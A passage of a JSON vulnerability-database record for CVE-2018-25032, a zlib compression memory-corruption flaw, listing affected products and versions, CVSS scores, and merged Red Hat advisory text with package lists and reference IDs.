"_id": null,
"model": "zulu",
"scope": "eq",
"trust": 1.0,
"vendor": "azul",
"version": "15.38"
},
{
"_id": null,
"model": "mariadb",
"scope": "lt",
"trust": 1.0,
"vendor": "mariadb",
"version": "10.9.2"
},
{
"_id": null,
"model": "mariadb",
"scope": "lt",
"trust": 1.0,
"vendor": "mariadb",
"version": "10.3.36"
},
{
"_id": null,
"model": "python",
"scope": "gte",
"trust": 1.0,
"vendor": "python",
"version": "3.7.0"
},
{
"_id": null,
"model": "python",
"scope": "gte",
"trust": 1.0,
"vendor": "python",
"version": "3.10.0"
},
{
"_id": null,
"model": "h410c",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "scalance sc632-2c",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "3.0"
},
{
"_id": null,
"model": "zulu",
"scope": "eq",
"trust": 1.0,
"vendor": "azul",
"version": "7.52"
},
{
"_id": null,
"model": "zulu",
"scope": "eq",
"trust": 1.0,
"vendor": "azul",
"version": "13.46"
},
{
"_id": null,
"model": "mariadb",
"scope": "gte",
"trust": 1.0,
"vendor": "mariadb",
"version": "10.5.0"
},
{
"_id": null,
"model": "python",
"scope": "gte",
"trust": 1.0,
"vendor": "python",
"version": "3.9.0"
},
{
"_id": null,
"model": "macos",
"scope": "gte",
"trust": 1.0,
"vendor": "apple",
"version": "12.0.0"
},
{
"_id": null,
"model": "python",
"scope": "lt",
"trust": 1.0,
"vendor": "python",
"version": "3.7.14"
},
{
"_id": null,
"model": "mariadb",
"scope": "lt",
"trust": 1.0,
"vendor": "mariadb",
"version": "10.4.26"
},
{
"_id": null,
"model": "scalance sc622-2c",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "3.0"
},
{
"_id": null,
"model": "mac os x",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "10.15.7"
},
{
"_id": null,
"model": "mariadb",
"scope": "lt",
"trust": 1.0,
"vendor": "mariadb",
"version": "10.5.17"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "36"
},
{
"_id": null,
"model": "python",
"scope": "gte",
"trust": 1.0,
"vendor": "python",
"version": "3.8.0"
},
{
"_id": null,
"model": "scalance sc636-2c",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "3.0"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "9.0"
},
{
"_id": null,
"model": "mariadb",
"scope": "gte",
"trust": 1.0,
"vendor": "mariadb",
"version": "10.7.0"
},
{
"_id": null,
"model": "scalance sc642-2c",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "3.0"
},
{
"_id": null,
"model": "zlib",
"scope": "lt",
"trust": 1.0,
"vendor": "zlib",
"version": "1.2.12"
},
{
"_id": null,
"model": "zulu",
"scope": "eq",
"trust": 1.0,
"vendor": "azul",
"version": "8.60"
},
{
"_id": null,
"model": "e-series santricity os controller",
"scope": "lte",
"trust": 1.0,
"vendor": "netapp",
"version": "11.70.2"
},
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "macos",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "12.4"
},
{
"_id": null,
"model": "python",
"scope": "lt",
"trust": 1.0,
"vendor": "python",
"version": "3.8.14"
},
{
"_id": null,
"model": "mariadb",
"scope": "gte",
"trust": 1.0,
"vendor": "mariadb",
"version": "10.9.0"
},
{
"_id": null,
"model": "gotoassist",
"scope": "lt",
"trust": 1.0,
"vendor": "goto",
"version": "11.9.18"
},
{
"_id": null,
"model": "mariadb",
"scope": "gte",
"trust": 1.0,
"vendor": "mariadb",
"version": "10.4.0"
},
{
"_id": null,
"model": "ontap select deploy administration utility",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "zulu",
"scope": "eq",
"trust": 1.0,
"vendor": "azul",
"version": "11.54"
},
{
"_id": null,
"model": "macos",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "11.6.6"
},
{
"_id": null,
"model": "active iq unified manager",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "oncommand workflow automation",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "nokogiri",
"scope": "lt",
"trust": 1.0,
"vendor": "nokogiri",
"version": "1.13.4"
},
{
"_id": null,
"model": "mariadb",
"scope": "gte",
"trust": 1.0,
"vendor": "mariadb",
"version": "10.8.0"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "34"
},
{
"_id": null,
"model": "scalance sc646-2c",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "3.0"
},
{
"_id": null,
"model": "mac os x",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "10.15.7"
},
{
"_id": null,
"model": "mariadb",
"scope": "gte",
"trust": 1.0,
"vendor": "mariadb",
"version": "10.3.0"
},
{
"_id": null,
"model": "zulu",
"scope": "eq",
"trust": 1.0,
"vendor": "azul",
"version": "17.32"
},
{
"_id": null,
"model": "python",
"scope": "lt",
"trust": 1.0,
"vendor": "python",
"version": "3.9.13"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-25032"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "167622"
},
{
"db": "PACKETSTORM",
"id": "167271"
},
{
"db": "PACKETSTORM",
"id": "169897"
},
{
"db": "PACKETSTORM",
"id": "171159"
},
{
"db": "PACKETSTORM",
"id": "169782"
},
{
"db": "PACKETSTORM",
"id": "167346"
},
{
"db": "PACKETSTORM",
"id": "167265"
},
{
"db": "PACKETSTORM",
"id": "167679"
}
],
"trust": 0.8
},
"cve": "CVE-2018-25032",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CVE-2018-25032",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.1,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-418557",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "CVE-2018-25032",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2018-25032",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2018-25032",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202203-2221",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-418557",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2018-25032",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-418557"
},
{
"db": "VULMON",
"id": "CVE-2018-25032"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-2221"
},
{
"db": "NVD",
"id": "CVE-2018-25032"
},
{
"db": "NVD",
"id": "CVE-2018-25032"
}
]
},
"description": {
"_id": null,
"data": "zlib before 1.2.12 allows memory corruption when deflating (i.e., when compressing) if the input has many distant matches. Description:\n\nRed Hat Advanced Cluster Management for Kubernetes 2.3.11 images\n\nRed Hat Advanced Cluster Management for Kubernetes provides the\ncapabilities to address common challenges that administrators and site\nreliability engineers face as they work across a range of public and\nprivate cloud environments. Clusters and applications are all visible and\nmanaged from a single console\u2014with security policy built in. Bugs fixed (https://bugzilla.redhat.com/):\n\n2057544 - Cancel rpm-ostree transaction after failed rebase\n2058674 - whereabouts IPAM CNI ip-reconciler cronjob specification requires hostnetwork, api-int lb usage \u0026 proper backoff\n2062655 - [4.8.z backport] cluster scaling new nodes ovs-configuration fails on all new nodes\n2070762 - [4.8z] WebScale: duplicate ecmp next hop error caused by multiple of the same gateway IPs in ovnkube cache\n2074053 - Internal registries with a big number of images delay pod creation due to recursive SELinux file context relabeling\n2074680 - csv_succeeded metric not present in olm-operator for all successful CSVs\n2076211 - CVE-2022-1677 openshift/router: route hijacking attack via crafted HAProxy configuration file\n2077004 - Bump to latest available 1.21.11 k8s\n2077370 - [4.8.z] NetworkPolicy tests are failing on metal IPv6\n2077765 - (release-4.8) Gather namespace names with overlapping UID ranges\n2078477 - Latest ose-jenkins-agent-base:v4.9.0 image fails to start on OpenShift due to FIPS error\n2084259 - [4.8] OCP ignores STOPSIGNAL in Dockerfile and sends SIGTERM\n2088196 - Redfish set boot device failed for node in OCP 4.8 latest RC\n\n5. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: zlib security update\nAdvisory ID: RHSA-2023:0943-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2023:0943\nIssue date: 2023-02-28\nCVE Names: CVE-2018-25032 \n=====================================================================\n\n1. Summary:\n\nAn update for zlib is now available for Red Hat Enterprise Linux 7.7\nAdvanced Update Support, Red Hat Enterprise Linux 7.7 Telco Extended Update\nSupport, and Red Hat Enterprise Linux 7.7 Update Services for SAP\nSolutions. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Server AUS (v. 7.7) - x86_64\nRed Hat Enterprise Linux Server E4S (v. 7.7) - ppc64le, x86_64\nRed Hat Enterprise Linux Server Optional AUS (v. 7.7) - x86_64\nRed Hat Enterprise Linux Server Optional E4S (v. 7.7) - ppc64le, x86_64\nRed Hat Enterprise Linux Server Optional TUS (v. 7.7) - x86_64\nRed Hat Enterprise Linux Server TUS (v. 7.7) - x86_64\n\n3. Description:\n\nThe zlib packages provide a general-purpose lossless data compression\nlibrary that is used by many different programs. \n\nSecurity Fix(es):\n\n* zlib: A flaw found in zlib when compressing (not decompressing) certain\ninputs (CVE-2018-25032)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n2067945 - CVE-2018-25032 zlib: A flaw found in zlib when compressing (not decompressing) certain inputs\n\n6. Package List:\n\nRed Hat Enterprise Linux Server AUS (v. 7.7):\n\nSource:\nzlib-1.2.7-18.el7_7.1.src.rpm\n\nx86_64:\nzlib-1.2.7-18.el7_7.1.i686.rpm\nzlib-1.2.7-18.el7_7.1.x86_64.rpm\nzlib-debuginfo-1.2.7-18.el7_7.1.i686.rpm\nzlib-debuginfo-1.2.7-18.el7_7.1.x86_64.rpm\nzlib-devel-1.2.7-18.el7_7.1.i686.rpm\nzlib-devel-1.2.7-18.el7_7.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server E4S (v. 7.7):\n\nSource:\nzlib-1.2.7-18.el7_7.1.src.rpm\n\nppc64le:\nzlib-1.2.7-18.el7_7.1.ppc64le.rpm\nzlib-debuginfo-1.2.7-18.el7_7.1.ppc64le.rpm\nzlib-devel-1.2.7-18.el7_7.1.ppc64le.rpm\n\nx86_64:\nzlib-1.2.7-18.el7_7.1.i686.rpm\nzlib-1.2.7-18.el7_7.1.x86_64.rpm\nzlib-debuginfo-1.2.7-18.el7_7.1.i686.rpm\nzlib-debuginfo-1.2.7-18.el7_7.1.x86_64.rpm\nzlib-devel-1.2.7-18.el7_7.1.i686.rpm\nzlib-devel-1.2.7-18.el7_7.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server TUS (v. 7.7):\n\nSource:\nzlib-1.2.7-18.el7_7.1.src.rpm\n\nx86_64:\nzlib-1.2.7-18.el7_7.1.i686.rpm\nzlib-1.2.7-18.el7_7.1.x86_64.rpm\nzlib-debuginfo-1.2.7-18.el7_7.1.i686.rpm\nzlib-debuginfo-1.2.7-18.el7_7.1.x86_64.rpm\nzlib-devel-1.2.7-18.el7_7.1.i686.rpm\nzlib-devel-1.2.7-18.el7_7.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional AUS (v. 7.7):\n\nx86_64:\nminizip-1.2.7-18.el7_7.1.i686.rpm\nminizip-1.2.7-18.el7_7.1.x86_64.rpm\nminizip-devel-1.2.7-18.el7_7.1.i686.rpm\nminizip-devel-1.2.7-18.el7_7.1.x86_64.rpm\nzlib-debuginfo-1.2.7-18.el7_7.1.i686.rpm\nzlib-debuginfo-1.2.7-18.el7_7.1.x86_64.rpm\nzlib-static-1.2.7-18.el7_7.1.i686.rpm\nzlib-static-1.2.7-18.el7_7.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional E4S (v. 7.7):\n\nppc64le:\nminizip-1.2.7-18.el7_7.1.ppc64le.rpm\nminizip-devel-1.2.7-18.el7_7.1.ppc64le.rpm\nzlib-debuginfo-1.2.7-18.el7_7.1.ppc64le.rpm\nzlib-static-1.2.7-18.el7_7.1.ppc64le.rpm\n\nx86_64:\nminizip-1.2.7-18.el7_7.1.i686.rpm\nminizip-1.2.7-18.el7_7.1.x86_64.rpm\nminizip-devel-1.2.7-18.el7_7.1.i686.rpm\nminizip-devel-1.2.7-18.el7_7.1.x86_64.rpm\nzlib-debuginfo-1.2.7-18.el7_7.1.i686.rpm\nzlib-debuginfo-1.2.7-18.el7_7.1.x86_64.rpm\nzlib-static-1.2.7-18.el7_7.1.i686.rpm\nzlib-static-1.2.7-18.el7_7.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional TUS (v. 7.7):\n\nx86_64:\nminizip-1.2.7-18.el7_7.1.i686.rpm\nminizip-1.2.7-18.el7_7.1.x86_64.rpm\nminizip-devel-1.2.7-18.el7_7.1.i686.rpm\nminizip-devel-1.2.7-18.el7_7.1.x86_64.rpm\nzlib-debuginfo-1.2.7-18.el7_7.1.i686.rpm\nzlib-debuginfo-1.2.7-18.el7_7.1.x86_64.rpm\nzlib-static-1.2.7-18.el7_7.1.i686.rpm\nzlib-static-1.2.7-18.el7_7.1.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2018-25032\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2023 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBY/3zpNzjgjWX9erEAQgopRAAnicJE4nJGD63kGm+PqFucbREdCZ3tCHM\nppSjAZYm6e3z2cXqCA8Y/ZQxQjLGFUuT3PtzsD8eehFIu7WL6hO7s+jVaor/PYxG\nh1X9YRrtAGlCrMwUXgSpTmqCeXMofoXhZRgj/0fJASp/+C6sMOBYyJkPsSCT00fu\nbIU/TEKTFa6UNjLGBZLNMD1htyYAI70mrLp+zJB4HlFP8G7bX8XMduBwyFu8l9Ye\nC4u9A4n1yUWo6eJpK1jn91y9W0VcB2JEnCQ3CySVI4Oa0hzSQBEfVnGDicELtAcv\nF6yV4AcCk30JtsXLtihnZszk5Ke0uH/VICY9ubPH52rBqLzCELWrAtEkcfGJnPFr\n/TrCfgDC9vIDE9+QPWamraX62NKy9vwOf/pPOnSOGJUYngYuVIJl/ipWwbr0BhLd\nJ3Ckbo0jlXjjXmMKnfv0LDr/0dvLNGc4VjqbEcJULNMiUu3Lh/I0/v3H7NCr8674\nRFDBaKXJlzgJGCcQ7JFr/63Aw6kOp9lVJgjbnDYs1AV/FQVkLsIvw5hIdONZI5cP\nuJcrO4lfjw/4827E7gdBTnQEBRuZB/wGtmtcFrvIPiK+qWl0t457ic+nvDl8noiM\nkBZezS7yByEjCqudJgxEYrB8uUt+gX9aj08sqeyM9jSzUCpJAVCNycufQGvmblNA\nvP1CheTiOdc=\n=wNUm\n-----END PGP SIGNATURE-----\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. 8) - noarch\n\n3. \n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 8.7 Release Notes linked from the References section. Bugs fixed (https://bugzilla.redhat.com/):\n\n2053429 - CVE-2022-23806 golang: crypto/elliptic IsOnCurve returns true for invalid field elements\n2053532 - CVE-2022-23772 golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString\n2053541 - CVE-2022-23773 golang: cmd/go: misinterpretation of branch names can lead to incorrect access control\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nSRVKE-1217 - New KafkaSource implementation does not default to PLAIN for SASL\n\n6. Description:\n\nRed Hat OpenShift Container Platform is Red Hat\u0027s cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments. \n\nThis advisory contains the container images for Red Hat OpenShift Container\nPlatform 4.7.51. See the following advisory for the RPM packages for this\nrelease:\n\nhttps://access.redhat.com/errata/RHBA-2022:2267\n\nSpace precludes documenting all of the container images in this advisory. \n\nYou may download the oc tool and use it to inspect release image metadata\nas follows:\n\n(For x86_64 architecture)\n\n$ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.7.51-x86_64\n\nThe image digest is\nsha256:539c1f5982343e0709179f305e347560304fdeb89a09bd042a59a58a836a0940\n\n(For s390x architecture)\n\n$ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.7.51-s390x\n\nThe image digest is\nsha256:f6fa9f75e6de166b6daccbc6830bbeaade38eac97faa2752e0c38af23aa4135e\n\n(For ppc64le architecture)\n\n$ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.7.51-ppc64le\n\nThe image digest is\nsha256:e4a1eb51749bdb0fa429e5b7f697d3b38cd32b76786dc1ce579a5d53827705b0\n\nAll OpenShift Container Platform 4.7 users are advised to upgrade to these\nupdated packages and images when they are available in the appropriate\nrelease channel. To check for available updates, use the OpenShift Console\nor the CLI oc command. Instructions for upgrading a cluster are available\nat\nhttps://docs.openshift.com/container-platform/4.7/updating/updating-cluster-cli.html\n\n3. Solution:\n\nFor OpenShift Container Platform 4.7 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-release-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.7/updating/updating-cluster-cli.html\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n2057526 - cloud provider config change breaks the cluster\n2076211 - CVE-2022-1677 openshift/router: route hijacking attack via crafted HAProxy configuration file\n2081483 - csv_succeeded metric not present in olm-operator for all successful CSVs\n2082029 - Bump to latest available 1.20.15 k8s\n\n5. Summary:\n\nThe Migration Toolkit for Containers (MTC) 1.7.2 is now available. Description:\n\nThe Migration Toolkit for Containers (MTC) enables you to migrate\nKubernetes resources, persistent volume data, and internal container images\nbetween OpenShift Container Platform clusters, using the MTC web console or\nthe Kubernetes API. Bugs fixed (https://bugzilla.redhat.com/):\n\n2007557 - CVE-2021-3807 nodejs-ansi-regex: Regular expression denial of service (ReDoS) matching ANSI escape codes\n2038898 - [UI] ?Update Repository? option not getting disabled after adding the Replication Repository details to the MTC web console\n2040693 - ?Replication repository? wizard has no validation for name length\n2040695 - [MTC UI] ?Add Cluster? wizard stucks when the cluster name length is more than 63 characters\n2044591 - CVE-2022-0235 node-fetch: exposure of sensitive information to an unauthorized actor\n2048537 - Exposed route host to image registry? connecting successfully to invalid registry ?xyz.com?\n2053259 - CVE-2022-0536 follow-redirects: Exposure of Sensitive Information via Authorization Header leak\n2055658 - [MTC UI] Cancel button on ?Migrations? page does not disappear when migration gets Failed/Succeeded with warnings\n2056962 - [MTC UI] UI shows the wrong migration type info after changing the target namespace\n2058172 - [MTC UI] Successful Rollback is not showing the green success icon in the ?Last State? field. \n2058529 - [MTC UI] Migrations Plan is missing the type for the state migration performed before upgrade\n2061335 - [MTC UI] ?Update cluster? button is not getting disabled\n2062266 - MTC UI does not display logs properly [OADP-BL]\n2062862 - [MTC UI] Clusters page behaving unexpectedly on deleting the remote cluster?s service account secret from backend\n2074675 - HPAs of DeploymentConfigs are not being updated when migration from Openshift 3.x to Openshift 4.x\n2076593 - Velero pod log missing from UI drop down\n2076599 - Velero pod log missing from downloaded logs folder [OADP-BL]\n2078459 - [MTC UI] Storageclass conversion plan is adding migstorage reference in migplan\n2079252 - [MTC] Rsync options logs not visible in log-reader pod\n2082221 - Don\u0027t allow Storage class conversion migration if source cluster has only one storage class defined [UI]\n2082225 - non-numeric user when launching stage pods [OADP-BL]\n2088022 - Default CPU requests on Velero/Restic are too demanding making scheduling fail in certain environments\n2088026 - Cloud propagation phase in migration controller is not doing anything due to missing labels on Velero pods\n2089126 - [MTC] Migration controller cannot find Velero Pod because of wrong labels\n2089411 - [MTC] Log reader pod is missing velero and restic pod logs [OADP-BL]\n2089859 - [Crane] DPA CR is missing the required flag - Migration is getting failed at the EnsureCloudSecretPropagated phase due to the missing secret VolumeMounts\n2090317 - [MTC] mig-operator failed to create a DPA CR due to null values are passed instead of int [OADP-BL]\n2096939 - Fix legacy operator.yml inconsistencies and errors\n2100486 - [MTC UI] Target storage class field is not getting respected when clusters don\u0027t have replication repo configured",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-25032"
},
{
"db": "VULHUB",
"id": "VHN-418557"
},
{
"db": "VULMON",
"id": "CVE-2018-25032"
},
{
"db": "PACKETSTORM",
"id": "167622"
},
{
"db": "PACKETSTORM",
"id": "167271"
},
{
"db": "PACKETSTORM",
"id": "169897"
},
{
"db": "PACKETSTORM",
"id": "171159"
},
{
"db": "PACKETSTORM",
"id": "169782"
},
{
"db": "PACKETSTORM",
"id": "167346"
},
{
"db": "PACKETSTORM",
"id": "167265"
},
{
"db": "PACKETSTORM",
"id": "167679"
}
],
"trust": 1.8
},
"exploit_availability": {
"_id": null,
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-418557",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-418557"
}
]
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2018-25032",
"trust": 2.6
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2022/03/28/3",
"trust": 1.8
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2022/03/26/1",
"trust": 1.8
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2022/03/28/1",
"trust": 1.8
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2022/03/24/1",
"trust": 1.8
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2022/03/25/2",
"trust": 1.8
},
{
"db": "SIEMENS",
"id": "SSA-333517",
"trust": 1.8
},
{
"db": "PACKETSTORM",
"id": "167346",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "169897",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "169782",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "167679",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "167622",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "168352",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "168042",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "167327",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "167391",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "167400",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "167956",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "167088",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "167142",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "168696",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "167008",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "167602",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "166946",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "166563",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "170003",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "167555",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "167224",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "167568",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "167260",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "167461",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "167591",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "168011",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "167189",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "167281",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "169624",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "166970",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "168392",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "167486",
"trust": 0.7
},
{
"db": "AUSCERT",
"id": "ESB-2022.1366",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.3050",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.2411",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.4601",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.3299",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.1665",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.1863",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.2561",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.4568",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.3228",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.2709",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.2474",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.2181",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.3821",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.3236",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.6128",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.5062",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.6112",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2023.3146",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.2857",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.2924",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2023.1695",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.1403",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.3136",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.3479",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.2019",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.3977",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.2778",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.4632",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.3020",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.6333",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.3112",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.2598",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.2900",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022033020",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022072056",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022050233",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022032845",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022051703",
